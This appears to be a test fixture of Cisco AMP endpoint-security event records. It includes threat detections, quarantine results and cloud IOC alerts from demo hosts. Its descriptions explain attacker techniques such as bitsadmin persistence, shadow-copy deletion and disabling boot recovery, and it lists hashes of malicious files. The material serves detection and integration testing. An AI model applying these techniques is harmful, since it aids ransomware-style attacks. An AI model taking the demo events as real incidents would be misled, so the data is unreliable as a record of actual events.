+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":525000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Overdrive.RET","detection_id":"6533241145273614337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"BIT4BBF.tmp","file_path":"\\\\?\\C:\\BIT4BBF.tmp","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"},"parent":{"process_id":896,"disposition":"Clean","file_name":"svchost.exe","identity":{"sha256":"121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2","sha1":"4af001b3c3816b860660cf2de2c0fd3c1dfb4878","md5":"54a47f6b5e09a77e61649109c6a08866"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6533241145273614000,"timestamp":1610618752,"timestamp_nanoseconds":619000000,"date":"2021-01-14T10:05:52+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6533241145273614338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739875754000,"timestamp":1610618750,"timestamp_nanoseconds":875739000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. 
This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.","short_description":"W32.WScriptExecuteFakeExtension.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739868158500,"timestamp":1610618750,"timestamp_nanoseconds":868146000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. 
This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.","short_description":"W32.Bitsadmin.ioc"},"file":{"disposition":"Clean","file_name":"bitsadmin.exe","file_path":"/C:/Windows/System32/bitsadmin.exe","identity":{"sha256":"838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00"},"parent":{"disposition":"Clean","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. 
This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. 
Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. 
Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. 
This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud 
IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch 
Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. 
In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy 
Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} 